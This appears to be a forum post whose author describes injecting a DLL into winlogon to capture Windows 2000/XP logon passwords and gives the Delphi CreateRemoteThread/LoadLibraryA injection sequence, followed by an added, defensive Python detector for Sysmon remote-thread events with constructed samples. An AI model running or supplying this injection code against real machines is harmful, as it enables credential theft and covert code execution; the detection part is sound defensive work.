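I already did remote-thread creation in Delphi a year ago; you can even insert a DLL into winlogon to obtain the 2000/XP logon password, although of course that takes a few tricks.

GetWindowThreadProcessId(hParent,@dwRemoteProcessId);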
hRemoteProcess:=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
getmem(pszLibFileName,cb);
strcopy(pszLibFileName,pchar(ExtractFilePath(ParamStr(0))+'\shellapi.dll'));
pszLibFileRemote:=VirtualAllocEx(hRemoteProcess,NIL,cb,MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess,pszLibFileRemote,pszLibFileName,cb,pcb);
Freemem(pszLibFileName);
hkernel32:=GetModuleHandle('Kernel32.dll');
pfnStartAddr:=GetProcAddress(hkernel32,'LoadLibraryA');
hRemoteThread:=CreateRemoteThread(hRemoteProcess,NIL,0,pfnStartAddr,pszLibFileRemote,0,pcb);
WaitForSingleObject(hRemoteThread,INFINITE);
TerminateThread(hRemoteThread,0);
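
From the defender's side, the call sequence in the post above leaves a recognizable trace: a thread created in another process whose start address is a library loader. The following is an added example, not code from the original post, and it assumes Sysmon is deployed and logging Event ID 8 (CreateRemoteThread); the sample events, file paths and severity levels are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
LOADERS = {"loadlibrarya", "loadlibraryw", "loadlibraryexa", "loadlibraryexw"}
LOADER_MODULES = ("\\kernel32.dll", "\\kernelbase.dll")
SENSITIVE = {"winlogon.exe", "lsass.exe"}  # assumption: targets that raise severity

def parse_event(xml_text):
    """Return (event_id, {field name: value}) for one event in Windows event XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    fields = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, fields

def classify(xml_text):
    """Return 'high', 'medium' or None for one event."""
    event_id, f = parse_event(xml_text)
    if event_id != 8:  # only Sysmon CreateRemoteThread events are of interest
        return None
    # A loader as thread entry point means the thread argument is a DLL path.
    if f.get("StartFunction", "").lower() not in LOADERS:
        return None
    if not f.get("StartModule", "").lower().endswith(LOADER_MODULES):
        return None
    target = f.get("TargetImage", "").lower().rsplit("\\", 1)[-1]
    return "high" if target in SENSITIVE else "medium"

def sample(event_id, **fields):
    """Build a constructed event; real Sysmon events carry more fields."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")

K32 = r"C:\Windows\System32\kernel32.dll"
SAMPLES = [  # constructed sample events, not captured logs
    sample(8, SourceImage=r"C:\Temp\tool.exe", TargetImage=r"C:\Windows\System32\winlogon.exe",
           StartModule=K32, StartFunction="LoadLibraryA"),
    sample(8, SourceImage=r"C:\Temp\tool.exe", TargetImage=r"C:\Windows\System32\notepad.exe",
           StartModule=K32, StartFunction="LoadLibraryA"),
    sample(8, SourceImage=r"C:\Windows\System32\csrss.exe",
           TargetImage=r"C:\Windows\System32\cmd.exe",
           StartModule=K32, StartFunction="CtrlRoutine"),
    sample(1, Image=r"C:\Windows\System32\notepad.exe"),
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s))
```

Pairing a hit with a Sysmon Event ID 10 (ProcessAccess) record from the same source process, where the requested access is as broad as the PROCESS_ALL_ACCESS used in the post, gives a stronger signal than either event alone.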